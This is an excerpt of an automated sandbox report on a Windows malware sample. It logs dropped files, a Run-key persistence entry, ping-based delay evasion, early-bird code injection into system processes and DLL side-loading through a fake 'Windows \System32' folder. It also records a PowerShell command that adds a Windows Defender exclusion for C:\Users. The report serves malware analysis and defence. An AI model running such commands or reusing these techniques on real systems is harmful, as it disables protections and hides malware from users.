Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Users\Public\Libraries\Elpuxpki.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Program Files\Common Files\system\symsrv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\netutils.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\easinvoker.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\netutils.dll			Jump to dropped file

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki			Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki			Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6360	Thread sleep count: 98 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6360	Thread sleep time: -49000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6103			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3097			Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Dropped PE file which has not been started: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Dropped PE file which has not been started: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: 0vJrK0NCd1.exe, 00000000.00000002.463584485.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows \System32\easinvoker.exe

Code function: 22_2_613C1B60 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

22_2_613C1B60

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3300000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2B50000 protect: page execute and read and write

DLL side loading technique detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\System32\netutils.dll

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
